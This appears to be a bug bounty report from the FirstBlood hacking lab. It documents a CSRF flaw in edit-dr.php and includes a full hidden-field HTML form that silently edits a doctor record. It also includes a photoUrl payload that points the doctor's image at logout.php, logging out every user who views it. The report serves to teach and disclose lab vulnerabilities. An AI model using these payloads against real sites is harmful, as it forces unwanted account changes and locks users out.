FirstBlood-#1422 — CSRF on edit-dr.php leads to admin DoS
This issue was discovered on FirstBlood v3
On 2022-12-10, agentmellow Level 3 reported:
As I returned to login.php this lead me to the logout.php and its functionality.
First I realized the POST request at edit-dr.php with a custom photoUrl= can be made, as the parameter &csrf token isnt validated; CSRF. Thus a logged in user submitting the form will update the doctor accordingly(htmlencodings will be nessisary!).
<body> <script>history.pushState('', '', '/')</script> <form action="https://37c0d79bc56b-agentmellow.a.firstbloodhackers.com/drpanel/drapi/edit-dr.php" method="POST"> <input type="hidden" name="drid" value="4" /> <input type="hidden" name="name" value="Sean" /> <input type="hidden" name="bio" value="MyBioCSRF" /> <input type="hidden" name="bookable" value="1" /> <input type="hidden" name="photoUrl" value="/test.png" /> <input type="submit" value="Submit request" /> </form> </body> </html>
And while that is a fun, its even funnier to point the photoUrl to the GET logout.php via CSRF (htmlencodings will be nessisary!). Edit the form script above to:
<input type="hidden" name="photoUrl" value="//firstblood/../drpanel/logout.php">
Or for brevity: photoUrl=//firstblood/../drpanel/logout.php
- This can also be done as an authenticated user, simply using the POST request as an authenticated user, point the logout.php in the image src of doctor 4 in my example:
DoS on any authenticated user logging in!:
POC with image-src loading logout.php:
One can also try to login with the default credentials, but will be logged out instantly.
This report contains multiple vulnerabilities:
FirstBlood ID: 61
Vulnerability Type: Application/Business Logic
It mentions that doctor photos can NOT be modified but it is actually possible to modify them
FirstBlood ID: 58
Vulnerability Type: Cross Site Request Forgery
There is a CSRF vulnerability on /drpanel/edit-dr.php via a GET request and lack of token validation. It was intended that a POST request does not work due to no cookies sent on the request (because of SameSite), but to an over sight this cookie was overwritten rendering it useless.